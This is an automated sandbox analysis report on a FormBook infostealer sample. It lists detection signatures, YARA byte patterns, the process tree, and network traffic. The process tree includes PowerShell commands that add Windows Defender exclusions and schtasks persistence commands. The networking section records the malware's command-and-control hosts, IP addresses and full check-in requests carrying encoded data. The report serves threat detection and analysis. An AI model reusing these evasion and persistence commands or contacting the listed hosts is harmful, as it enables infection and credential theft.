Windows Analysis Report
CFV20240600121.exe

Overview

General Information

Sample name:CFV20240600121.exe
Analysis ID:1454436
MD5:8874212365ef57aeee15045f9ec684eb
SHA1:f509011e519095509f0368dc9289bdc6a48ebe96
SHA256:ad27785339182485262a3a4b39d554d00aa73cb1ca437a28b181df2901036404
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • CFV20240600121.exe (PID: 5640 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6096 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1288 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CFV20240600121.exe (PID: 4292 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • CFV20240600121.exe (PID: 2556 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • CFV20240600121.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • CFV20240600121.exe (PID: 3664 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
      • RLaIKKYKtFdTMrMFejOcvZaAxPi.exe (PID: 6164 cmdline: "C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 7540 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • RLaIKKYKtFdTMrMFejOcvZaAxPi.exe (PID: 2608 cmdline: "C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • BPSHhDGmARC.exe (PID: 1288 cmdline: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe MD5: 8874212365EF57AEEE15045F9EC684EB)
      • schtasks.exe (PID: 7296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • BPSHhDGmARC.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
      • BPSHhDGmARC.exe (PID: 7368 cmdline: "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dad3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x328ca:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1c109:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
12.2.CFV20240600121.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
12.2.CFV20240600121.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dad3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
12.2.CFV20240600121.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
12.2.CFV20240600121.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ccd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16512:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", ProcessId: 6500, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe, ParentImage: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe, ParentProcessId: 1288, ParentProcessName: BPSHhDGmARC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp", ProcessId: 7296, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", ProcessId: 1288, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", ProcessId: 6500, ProcessName: powershell.exe

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", ProcessId: 1288, ProcessName: schtasks.exe

            AV Detection

            Source: https://zijrmf.com/register, Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe, ReversingLabs: Detection: 28%
            Source: CFV20240600121.exe, ReversingLabs: Detection: 28%
            Source: CFV20240600121.exe, Virustotal: Detection: 41%
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeJoe Sandbox ML: detected
            Source: CFV20240600121.exeJoe Sandbox ML: detected
            Source: CFV20240600121.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: CFV20240600121.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: write.pdbGCTL source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308515930.000000000087E000.00000002.00000001.01000000.0000000D.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451569346.000000000087E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CFV20240600121.exe, CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 4x nop then jmp 0A13F71Eh0_2_0A13EF37
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 4x nop then jmp 0723E986h13_2_0723E19F

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49717 -> 101.36.121.143:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51370 -> 85.13.162.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51374 -> 34.149.87.45:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51378 -> 116.213.43.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51382 -> 102.222.124.13:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51386 -> 35.241.34.216:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51390 -> 176.113.70.180:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51394 -> 101.36.121.143:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51398 -> 103.138.88.32:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51402 -> 162.0.213.72:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51406 -> 217.116.0.191:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51410 -> 103.120.80.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51414 -> 64.226.69.42:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51418 -> 3.64.163.50:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51422 -> 172.67.160.38:80
            Source: DNS query: www.mg55aa.xyz
            Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
            Source: Joe Sandbox ViewASN Name: CKL1-ASNKE CKL1-ASNKE
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.am1-728585.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.witoharmuth.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fkxp/?kH=00U8ENLHk&TTv82Lg=/8gewv/74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4/yxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magnoliahairandco.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /a472/?TTv82Lg=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.binpvae.lolConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duzane.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ie8mce.websiteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shrongcen.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: unknownHTTP traffic detected: POST /jd4u/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.witoharmuth.comContent-Length: 208Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.witoharmuth.comReferer: http://www.witoharmuth.com/jd4u/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 54 54 76 38 32 4c 67 3d 69 62 55 76 61 56 39 4f 66 68 52 48 76 38 70 46 7a 4e 68 69 45 36 6f 6a 2f 55 6b 39 54 74 52 55 6e 45 72 41 59 4a 41 51 6d 32 43 2f 6f 30 47 72 54 50 71 4c 65 52 75 32 46 38 46 32 57 45 38 6f 30 49 55 52 6c 6b 6c 39 39 5a 5a 36 37 5a 6d 70 32 46 70 6f 2f 6b 71 58 79 72 6e 6d 33 4b 72 56 37 32 52 39 6a 6d 76 64 37 64 4e 4b 59 30 54 52 58 62 4d 34 78 58 34 77 34 63 54 51 48 56 5a 48 42 2b 54 54 4a 51 7a 41 71 37 4c 59 72 4e 6e 35 45 5a 4e 41 45 56 53 74 33 6a 6b 64 7a 46 64 4a 42 6c 63 45 58 69 32 44 31 7a 49 70 4b 52 69 6a 4a 42 59 77 46 4a 37 6e 66 53 45 55 44 47 43 50 52 41 75 37 41 6b 73 3d Data Ascii: TTv82Lg=ibUvaV9OfhRHv8pFzNhiE6oj/Uk9TtRUnErAYJAQm2C/o0GrTPqLeRu2F8F2WE8o0IURlkl99ZZ67Zmp2Fpo/kqXyrnm3KrV72R9jmvd7dNKY0TRXbM4xX4w4cTQHVZHB+TTJQzAq7LYrNn5EZNAEVSt3jkdzFdJBlcEXi2D1zIpKRijJBYwFJ7nfSEUDGCPRAu7Aks=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:20:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
